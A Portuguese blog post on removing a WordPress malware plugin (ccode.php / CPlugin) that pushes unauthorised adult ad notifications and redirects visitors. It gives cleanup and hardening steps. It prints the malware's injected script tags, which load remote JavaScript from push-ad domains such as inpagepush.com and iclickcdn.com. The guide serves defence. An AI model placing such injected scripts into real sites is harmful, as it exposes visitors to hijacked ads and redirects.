Como Corrigir Site WordPress com Malware de Notificações Push e Redirecionamentos Não Autorizados

Você está tendo problemas com notificações push ou pop-up não autorizados em seu site WordPress? 

E tendo muitos anúncios não autorizados, tendo conteúdo explícito em seu site? Esses anúncios também estão aparecendo em notificações push em dispositivos móveis? 

Você está sendo redirecionado para páginas desconhecidas a partir dos links de seu site? Então, seu site está afetado por um malware ativo recentemente que está se espalhando por fontes anônimas. Neste Artigo irei demonstrar como corrigir e removê-lo de seu servidor por completo!

Índice:

• Como esse malware se parece?
• Como ele afeta meu Site?
• Como remover o malware ccode.php do seu site WordPress
• Como proteger meu site WordPress destas ameaças

Como esse malware se parece?

Recentemente, tivemos problemas com este malware em nosso site, e isso pode afetar em muito a confiança do seu cliente em seu site, pois, muitas das vezes demonstram notificações de conteúdo adulto, por isso, é bom removê-lo o quanto antes de seu servidor.

Você pode se deparar com um código diferente, mas com semelhanças a este, pois esse malware se espalhou com nomes diferentes e código e urls modificadas.

Linha de código 1:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3388587,document.body||document.documentElement)</script>
<script src="https://propu.sh/pfe/current/tag.min.js?z=3388595" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3388600" data-cfasync="false" async="async"></script>                    

Linha de código 2:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>                    

Como ele afeta meu site?

Este malware é escrito na liguagem Php, e tem em média 400 linhas de código.

Na realidade ele age como um plugin que busca anúncios em diferentes mecanismos de pesquisa, inclusive ele fica no diretório de plugins, qual seja, wp-content/plugins.

Um comportamento peculiar é que, ele se oculta do Painel de controle do administrador e armazenará todos os endereços IP que cada administrador efetuou login em um arquivo de texto separado chamado admin_ips.txt.

Sendo assim, fica bastante difícil de detectar você mesmo o malware, sendo necessário acessar seu site por meio de uma aba anônima ou por meio de VPN. Sendo visível para todos os visitantes, o que torna bem embaraçoso caso ocorra.

Os possíveis nomes dos meliantes são: ccode.php e CPlugin , ambos podem aparecer.

Além disso, ele dispõe de um recurso de atualização automática. 

Ele usa allow_url_fopen para se atualizar automaticamente toda vez que tiver um código atualizado disponível. 

Como remover o malware ccode.php do seu site WordPress

Primeiramente, antes de começar a removê-lo é recomendável fazer um backup do site e do banco de dados.

O primeiro passo é acessar seu Cpanel e ir em seu Gerenciador de Arquivos e acessar o diretório: public_html/wp-content/plugins.

Com esse diretório aberto você irá habilitar para ver arquivos ocultos no menu do canto superior direito.

E então, você deverá apagar os arquivos ccode.php e admin_ips.txt, e lembre-se de apagar da lixeira também.

E agora? Estou livre dele? Ainda não, você deverá excluir também vestígios dele em seu Banco de dados.

Abra em seu Cpanel o phpMyAdmin e coloque aquela string específica em Pesquisar e selecione todas as tabelas para pesquisar. Ele irá mostrar-lhe todas as tabelas onde deixou vestígios. Nomes para esse malware a serem buscados: ccode.php, cplugin, e inpagepush.

Removendo malware inpagepush do WordPress, que também pode aparecer com os nomes ccode.php ou cplugin.

Apague todos os registros que constarem vestígios destes termos, como nas imagens abaixo:

Uma observação, pode ser que o nome do malware tenha mudado, porém o modo de removê-lo é o mesmo, nestes casos, inspecione o elemento em seu navegador em uma aba anônima para saber o nome do meliante, caso tenha um plugin de segurança vá até ele e veja se ele conseguiu rastrear as linhas de códigos maliciosos para saber o nome dele.

O último passo é limpar o cache do seu site para não sobrar nenhum rastro deste mal, bem como, alterar as senhas do Banco de Dados, do WordPress e de sua hospedagem.

Como proteger meu site WordPress destas ameaças

Há algumas coisas que podem ser feitas para pelo menos dificultar a ação destas ameaças, aqui vamos falar algumas.

Primeiro coisa antes de usar um site WordPress é recomendável trocar a URL padrão de login para o painel: wp-admin. A maioria dos plugins de segurança possuem este recurso.

Um outro procedimento recomendável é esconder todas as pastas padrões do WordPress de plugins e temas entre outras, plugins como Hide My Wp poderá fazer isso para você.

É extremamente recomendável ter pelo menos um plugin de segurança, recomendamos o Wordfence versão Premium.

Uma outra dica importante é não utilizar plugins piratas, que quase sempre vem com scripts maliciosos ocultos e malwares.

Além desses procedimentos é de suma importância ter um Certificado de Segurança SSL para criptografar informações trocadas entre seu site e visitantes.

Caso queira uma proteção realmente robusta recomendamos um firewall completo do sucuri.net, um dos melhores do mercado, ele também conta com serviços de remoção de malwares, vírus e códigos maliciosos de seu site entre outros serviços e produtos de cyber segurança.

Se este post te ajudou a se livrar desse malware ajude-nos e compartilhe com seus amigos! Para mais conteúdos se inscreva em nossa Newsletter.